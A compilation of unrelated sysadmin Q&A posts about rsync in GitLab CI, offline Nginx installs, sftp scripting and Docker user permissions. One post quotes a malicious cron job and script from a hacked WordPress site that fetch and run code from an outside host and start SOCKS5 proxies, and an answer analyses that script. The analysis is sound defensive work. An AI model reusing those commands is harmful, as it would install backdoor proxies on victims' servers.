When I push and my project does not yet exist on my server, everything works fine (as expected):
rsync --exclude=".git" -e ssh -avz --delete-after . $SSH_USER@$SSH_HOST:blog_symfony/
building file list ... done
created directory blog_symfony
[...]
sent 44,533,927 bytes received 5,523 bytes 5,239,935.29 bytes/sec
total size is 238,959,003 speedup is 5.37
The problem is that when I push a second time, it fails:
rsync: [generator] delete_file: rmdir(project/blog_symfony/project/blog_symfony) failed: Permission denied (13)
rsync: [generator] delete_file: rmdir(project/blog_symfony) failed: Permission denied (13)
deleting project/blog_symfony/translations/.gitignore
deleting project/blog_symfony/translations/
[...]
It creates, on the server side, a 'project' folder inside the blog_symfony folder:
cannot delete non-empty directory: project/blog_symfony
cannot delete non-empty directory: project
rsync error: some files/attrs were not transferred (see previous errors) (code 23) at main.c(1207) [sender=3.1.3]
sent 13,924 bytes received 175 bytes 28,198.00 bytes/sec
total size is 238,959,004 speedup is 16,948.65
Cleaning up project directory and file based variables 00:01
ERROR: Job failed: exit code 1
My .gitlab-ci.yml:
before_script:
  - 'which ssh-agent || ( apt-get update -y && apt-get install openssh-client -y )'
  - eval $(ssh-agent -s)
  - echo "$SSH_PRIVATE_KEY" | tr -d '\r' | ssh-add -
  - mkdir -p ~/.ssh
  - chmod 700 ~/.ssh
  - '[[ -f /.dockerenv ]] && echo -e "Host *\n\tStrictHostKeyChecking no\n\n" >> ~/.ssh/config'
script:
  - ls
  - apt-get update && apt-get install rsync -y
  - ssh $SSH_USER@$SSH_HOST "ls"
  - rsync --exclude=".git" -e ssh -avz --delete-after . $SSH_USER@$SSH_HOST:blog_symfony/
  - ssh $SSH_USER@$SSH_HOST "cd blog_symfony && docker-compose build && docker-compose up"
In ls -l I see a folder that was written by rsync and that is impossible to remove from GitLab CI:
drwxrwxr-x 3 root root 4096 Dec 14 23:26 project
I don't think this is normal. This is the first time I have used GitLab CI for a Symfony project.
Thank you for your help
ls -l: I have a folder written by rsync which is impossible to remove from GitLab CI.
Check whether that folder is instead created after the first execution of your docker-compose up: if your Docker image runs internally as USER root and uses a bind mount, it will write files and folders as root.
And that would impede normal operation (on the server, outside the container), like your rsync, because root-owned files would be in the way.
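If that is the case, a quick check on the server is to look at the numeric owner of the offending folder and, if it is 0 (root), reclaim it. The commands below are only a sketch of the usual fix, not something taken from your setup:
# a numeric owner of 0 means a root process (e.g. the container) wrote the folder
ls -ln blog_symfony/project
# reclaim ownership so rsync --delete-after can remove it again
sudo chown -R "$(id -u):$(id -g)" blog_symfony/project
# longer term, run the service as the deploy user instead of root,
# e.g. in docker-compose.yml:  user: "1000:1000"  (host UID:GID)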
I need to install Nginx on a target machine that has no internet connection. How can I install Nginx with all its dependencies in offline mode? Thanks in advance for your answers.
I recently went through this procedure, and this is what worked for me on CentOS 7:
You need an online Linux server to download the dependencies. You can use a virtual machine or anything else.
On your online server, create a .sh file and copy the script below into it (I named it download_dependencies.sh):
#!/bin/bash
# This script is used to fetch external packages that are not available in the standard Linux distribution
# Example: ./download_dependencies.sh ubuntu18.04
# The script will create nms-dependencies-ubuntu18.04.tar.gz in the local directory, which can be copied
# to the target machine; the packages inside can then be installed manually
set -eo pipefail

# current dir
PACKAGE_PATH="."
mkdir -p "$PACKAGE_PATH"

declare -A CLICKHOUSE_REPO
CLICKHOUSE_REPO['ubuntu18.04']="https://repo.clickhouse.tech/deb/lts/main"
CLICKHOUSE_REPO['ubuntu20.04']="https://repo.clickhouse.tech/deb/lts/main"
CLICKHOUSE_REPO['centos7']="https://repo.clickhouse.tech/rpm/lts/x86_64"
CLICKHOUSE_REPO['centos8']="https://repo.clickhouse.tech/rpm/lts/x86_64"
CLICKHOUSE_REPO['rhel7']="https://repo.clickhouse.tech/rpm/lts/x86_64"
CLICKHOUSE_REPO['rhel8']="https://repo.clickhouse.tech/rpm/lts/x86_64"

declare -A NGINX_REPO
NGINX_REPO['ubuntu18.04']="https://nginx.org/packages/mainline/ubuntu/pool/nginx/n/nginx/"
NGINX_REPO['ubuntu20.04']="https://nginx.org/packages/mainline/ubuntu/pool/nginx/n/nginx/"
NGINX_REPO['centos7']="https://nginx.org/packages/mainline/centos/7/x86_64/RPMS/"
NGINX_REPO['centos8']="https://nginx.org/packages/mainline/centos/8/x86_64/RPMS/"
NGINX_REPO['rhel7']="https://nginx.org/packages/mainline/rhel/7/x86_64/RPMS/"
NGINX_REPO['rhel8']="https://nginx.org/packages/mainline/rhel/8/x86_64/RPMS/"

CLICKHOUSE_KEY="https://repo.clickhouse.com/CLICKHOUSE-KEY.GPG"
NGINX_KEY="https://nginx.org/keys/nginx_signing.key"

declare -A CLICKHOUSE_PACKAGES
# for ClickHouse, package names are static between distributions
# we use the ubuntu/centos entries as placeholders
CLICKHOUSE_PACKAGES['ubuntu']="
clickhouse-server_21.3.10.1_all.deb
clickhouse-common-static_21.3.10.1_amd64.deb"
CLICKHOUSE_PACKAGES['centos']="
clickhouse-server-21.3.10.1-2.noarch.rpm
clickhouse-common-static-21.3.10.1-2.x86_64.rpm"
CLICKHOUSE_PACKAGES['ubuntu18.04']=${CLICKHOUSE_PACKAGES['ubuntu']}
CLICKHOUSE_PACKAGES['ubuntu20.04']=${CLICKHOUSE_PACKAGES['ubuntu']}
CLICKHOUSE_PACKAGES['centos7']=${CLICKHOUSE_PACKAGES['centos']}
CLICKHOUSE_PACKAGES['centos8']=${CLICKHOUSE_PACKAGES['centos']}
CLICKHOUSE_PACKAGES['rhel7']=${CLICKHOUSE_PACKAGES['centos']}
CLICKHOUSE_PACKAGES['rhel8']=${CLICKHOUSE_PACKAGES['centos']}

declare -A NGINX_PACKAGES
NGINX_PACKAGES['ubuntu18.04']="nginx_1.21.3-1~bionic_amd64.deb"
NGINX_PACKAGES['ubuntu20.04']="nginx_1.21.2-1~focal_amd64.deb"
NGINX_PACKAGES['centos7']="nginx-1.21.4-1.el7.ngx.x86_64.rpm"
NGINX_PACKAGES['centos8']="nginx-1.21.4-1.el8.ngx.x86_64.rpm"
NGINX_PACKAGES['rhel7']="nginx-1.21.4-1.el7.ngx.x86_64.rpm"
NGINX_PACKAGES['rhel8']="nginx-1.21.4-1.el8.ngx.x86_64.rpm"

download_packages() {
    local target_distribution=$1
    if [ -z "$target_distribution" ]; then
        echo "$0 - no target distribution specified"
        exit 1
    fi
    mkdir -p "${PACKAGE_PATH}/${target_distribution}"
    # just in case, delete all files in the target dir
    rm -f "${PACKAGE_PATH}/${target_distribution}"/*
    readarray -t clickhouse_files <<<"${CLICKHOUSE_PACKAGES[${target_distribution}]}"
    readarray -t nginx_files <<<"${NGINX_PACKAGES[${target_distribution}]}"
    echo "Downloading ClickHouse signing keys"
    curl -fs "$CLICKHOUSE_KEY" --output "${PACKAGE_PATH}/${target_distribution}/clickhouse-key.gpg"
    echo "Downloading Nginx signing keys"
    curl -fs "$NGINX_KEY" --output "${PACKAGE_PATH}/${target_distribution}/nginx-key.gpg"
    for package_file in "${clickhouse_files[@]}"; do
        if [ -z "$package_file" ]; then
            continue
        fi
        file_url="${CLICKHOUSE_REPO[$target_distribution]}/$package_file"
        save_file="${PACKAGE_PATH}/${target_distribution}/$package_file"
        echo "Fetching $file_url"
        curl -fs "$file_url" --output "$save_file"
    done
    for package_file in "${nginx_files[@]}"; do
        if [ -z "$package_file" ]; then
            continue
        fi
        file_url="${NGINX_REPO[$target_distribution]}/$package_file"
        save_file="${PACKAGE_PATH}/${target_distribution}/$package_file"
        echo "Fetching $file_url"
        curl -fs "$file_url" --output "$save_file"
    done
    bundle_file="${PACKAGE_PATH}/nms-dependencies-${target_distribution}.tar.gz"
    tar -zcf "$bundle_file" -C "${PACKAGE_PATH}/${target_distribution}" .
    echo "Bundle file saved as $bundle_file"
}

target_distribution=$1
if [ -z "$target_distribution" ]; then
    echo "Usage: $0 target_distribution"
    echo "Supported target distributions: ${!CLICKHOUSE_REPO[@]}"
    exit 1
fi
# check if the target distribution is supported
if [ -z "${CLICKHOUSE_REPO[$target_distribution]}" ]; then
    echo "Target distribution is not supported."
    echo "Supported distributions: ${!CLICKHOUSE_REPO[@]}"
    exit 1
fi
download_packages "${target_distribution}"
Then, from the same directory that contains download_dependencies.sh, run the command below:
bash download_dependencies.sh <your linux version>
In my case, I ran the command below (leave the argument blank to see the options):
bash download_dependencies.sh centos7
It should start downloading, and when it finishes you should see nms-dependencies-centos7.tar.gz in your directory.
Copy that file (.tar.gz) to your offline target.
Now, on your target machine, go to the directory into which you copied the file and run the code below:
tar -zxvf nms-dependencies-centos7.tar.gz
sudo yum install *.rpm
After installation, you can start the services using systemctl:
sudo systemctl start clickhouse-server
sudo systemctl start nginx
Your Nginx service should be running now!
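To double-check that both services actually came up, something like the following should work (the service names are simply the ones the packages above install):
sudo systemctl status nginx --no-pager
sudo systemctl status clickhouse-server --no-pager
# Nginx should answer with an HTTP status line
curl -I http://localhost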
You can also download the tar file on another system and copy it over.
Did you try this link?
https://gist.github.com/taufiqibrahim/d7f697de6bb8b93ca348a5b94d6adbfc
I have two AIX SFTP servers.
I want to move multiple files whose names start with the word cash, e.g. cash2001.txt, from one server to another using an sftp script, and then delete the successfully moved files from the original server.
I have tried the script below, but it is not working:
sftp -P 10022 EUSER_20233@11.214.6.920 <<EOF
put /data/sftp/current/cash*
exit
rm /data/sftp/current/cash*
EOF
As the rm should be deleting local files, you must execute it in the shell, not in sftp:
sftp -P 10022 EUSER_20233@11.214.6.920 <<EOF
put /data/sftp/current/cash*
exit
EOF
rm /data/sftp/current/cash*
You may want to improve your code to delete the files only when the transfer succeeds. Based on How to confirm SFTP file delivery?, you can do the following (in bash; I do not know AIX):
sftp -P 10022 EUSER_20233@11.214.6.920 -b - <<EOF
put /data/sftp/current/cash*
exit
EOF
if [ $? -eq 0 ]
then
    rm /data/sftp/current/cash*
fi
I am currently working on a research tool that is supposed to be containerized with Docker so that it can hopefully run on as many different systems as possible. This works fine for the most part, but we have run into a permission problem because of the workflow: the tool takes an input file (which we mount into the container), evaluates it using R scripts, and is then supposed to generate a report on the input file exactly where the file was taken from on the host system.
The latter part is problematic, as at least in our university context the internal container user lacks write permissions in the (non-root) user home folders from which we are currently taking our testing data. This would obviously also be bad in a production context, as we don't know how a potential user's system is set up, which is why we are trying to dynamically and temporarily match the container user's permissions to the host user's.
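For context, the container is currently invoked roughly like this (a sketch; the image name and the mounted path are placeholders, not our real names):
# mount the host folder holding the input; the report should land next to the input file
docker run --rm -v "$HOME/data:/work/files" our-tool-image /work/files/input.csv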
I have found different solutions that involve passing the UID/GID to the Docker daemon when building the container, in one way or another:
docker build --build-arg USER_ID=$(id -u ${USER}) --build-arg GROUP_ID=$(id -g ${USER}) -t IMAGE .
I also changed the Dockerfile accordingly, following a tutorial that suggested replacing the internal www-data user:
[...Package installation steps that are supposed to be run as root...]

ARG USER_ID
ARG GROUP_ID

RUN if [ ${USER_ID:-0} -ne 0 ] && [ ${GROUP_ID:-0} -ne 0 ]; then \
        userdel -f www-data && \
        if getent group www-data; then groupdel www-data; fi && \
        groupadd -g ${GROUP_ID} www-data && \
        useradd -l -u ${USER_ID} -g www-data www-data && \
        install -d -m 0755 -o www-data -g www-data /work/ && \
        chown --changes --silent --no-dereference --recursive \
            --from=33:33 ${USER_ID}:${GROUP_ID} \
            /work \
    ; fi

USER www-data
WORKDIR /work
RUN mkdir files

COPY data/ /opt/MTB/data/
COPY helpers/ /opt/MTB/helpers/
COPY src/www/ /opt/MTB/www/
COPY tmp/ /opt/MTB/tmp/
COPY example_data/ /opt/MTB/example_data/
COPY src/ /opt/MTB/src/

EXPOSE 8080
ENTRYPOINT ["/opt/MTB/src/starter_s_c.sh"]
The entrypoint script starter_s_c.sh is a small bash script that feeds the trailing argument to the corresponding R script as an input file; the R script writes the report.
This works, but it requires the container to be rebuilt for every new user. What we are looking for is a solution that handles the dynamic permission setting at runtime, so that we only have to build the container once and can use it with many different user configurations.
I have found this approach, but I am not entirely sure how to implement it, as it would replace our entrypoint script, and I'm not sure how to integrate it into our project.
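As far as I understand it, the runtime variant boils down to an entrypoint that starts as root, aligns the internal user with the owner of the bind-mounted input, and only then drops privileges. A minimal sketch of what I think is meant (assuming gosu is available in the image; the stat probe and variable names are my own):
#!/bin/sh
# map www-data onto the UID/GID that owns the mounted input file,
# then drop from root to that user before running the real entrypoint
TARGET_UID=$(stat -c '%u' "$1")
TARGET_GID=$(stat -c '%g' "$1")
groupmod -o -g "$TARGET_GID" www-data
usermod -o -u "$TARGET_UID" www-data
exec gosu www-data /opt/MTB/src/starter_s_c.sh "$@"
This would also require dropping the USER www-data line from the Dockerfile so that the entrypoint itself still runs as root.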
Here is our current entrypoint script which already needs the permissions to be set so localmaster.r can generate the report in the host directory:
#!/bin/sh
file="$1"
cd "$(dirname "$0")/.."
if [ $# -eq 0 ]; then
    echo '.libPaths(c("~/lib/R/library", .libPaths())); library(shiny); library(shinyjs); runApp("src")' | R --vanilla
else
    echo "Rscript --vanilla /opt/MTB/src/localmaster.r $file"
    Rscript --vanilla /opt/MTB/src/localmaster.r "$file"
fi
(If no arguments are given, it starts a Shiny app; that branch is just to avoid confusion.)
Any help or tips would be much appreciated! Thank you.
Apparently a site I do some volunteer work for was one of a few thousand sites targeted in a recent hack that exploited some vulnerability in WordPress. The result of the breach was a cron job added to the site:
0 */48 * * * cd /tmp;wget clintonandersonperformancehorses.com/test/test;bash test;cd /tmp;rm -rf test
The file it was pulling is this (obviously, don't try to execute it...):
killall -9 perl
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
sh getip >>bug.txt
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
bash mbind clean.txt
bash binded.txt
cd ..
rm -rf stest
I was hoping someone could tell me what it does. I cleaned out the cron job and will follow all the other advice available to secure the site again, but I am worried that some additional damage might have been done that is not as obvious. I just can't figure out what the heck that file was actually doing.
I just can't figure out what the heck that file was actually doing.
Quick Summary
In summary, it kills all perl processes and then starts SOCKS5 servers on all of the machine's external IP addresses.
In Depth
In more detail, let's look at the script line-by-line:
killall -9 perl
This kills all perl processes.
cd /tmp
wget clintonandersonperformancehorses.com/test/stest.tar
tar -vxf stest.tar
rm -rf stest.tar
cd stest
The above downloads the file stest.tar and untars it in the /tmp/stest directory, deletes the tar file, and moves into the directory which now holds the downloaded files.
sh getip >>bug.txt
The getip script, part of stest.tar, uses icanhazip.com to find your public IP address and stores that in the file bug.txt.
/sbin/ifconfig |grep "inet addr" |grep -v 127.0.0 |grep -v \:.192\. |awk -F ':' '{print $2}' |awk -F ' ' '{print $1}' >>bug.txt
cat bug.txt |sort |uniq >clean.txt
rm -rf bug.txt
The above uses ifconfig to check for any other non-local IP addresses that your machine answers to and adds them to bug.txt. Duplicates are removed and the final list of your public IP addresses is saved in the file clean.txt.
bash mbind clean.txt
This is the meat of the script. mbind, which was part of stest.tar, runs the script inst on each IP address in clean.txt. For that IP address, inst, also part of stest.tar, selects a port at random and starts a copy of "Simple SOCKS5 Server for Perl" on that IP and that port.
More specifically, the SOCKS server that is run is version 1.4 of Simple Socks Server for Perl, which can be downloaded from SourceForge. The version used here differs from the SourceForge version in only minor respects: a help message is suppressed, the md5 option is removed, and the IP and port are included in the script rather than passed in on the command line. I suspect that the purpose of the latter change is to make the script's command line look relatively innocuous when viewed with a utility such as ps.
bash binded.txt
The script binded.txt was created by inst. It apparently runs a check on the SOCKS5 server.
cd ..
rm -rf stest
The last part just does clean-up. It removes all the un-tarred files and the temporary files created by the scripts.
How to determine if one of the SOCKS servers is still running
The script inst (part of the .tar file) starts each SOCKS server with the command:
/usr/bin/perl httpd
To see if one is still running, look through the output of ps wax and see whether that command appears. If it does, use the kill command to stop it.
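For example (the [p] in the grep pattern just keeps grep from matching its own process; the PID is a placeholder):
# list any surviving SOCKS servers started as "/usr/bin/perl httpd"
ps wax | grep '[p]erl httpd'
# if one shows up, kill it by its PID
kill -9 12345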
I would like to use rsync to synchronise my /rsync folder.
I created the rsync user on my two servers and configured the SSH key.
I installed rsync, created the /rsync folder, and put chmod 777 on it.
But when I execute
rsync -avz -e ssh rsync@1.2.3.4:/rsync /rsync -p 8682
I get:
Unexpected local arg: /rsync
If arg is a remote file/dir, prefix it with a colon (:).
rsync error: syntax or usage error (code 1) at main.c(1246) [Receiver=3.0.9]
("ssh rsync#1.2.3.4 -p 8682" works)
rsync itself does not take -p as a port (for rsync, -p means preserve permissions), so 8682 ends up being treated as the destination and /rsync as an unexpected extra argument. Pass the port to ssh instead:
rsync -avz -e 'ssh -p 8682' rsync@1.2.3.4:/rsync /rsync
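Alternatively, you can put the port into ~/.ssh/config once, so a plain -e ssh (or no -e at all) keeps working; the host alias here is made up:
# ~/.ssh/config
Host backupserver
    HostName 1.2.3.4
    Port 8682
    User rsync
Then rsync -avz backupserver:/rsync /rsync does the same thing.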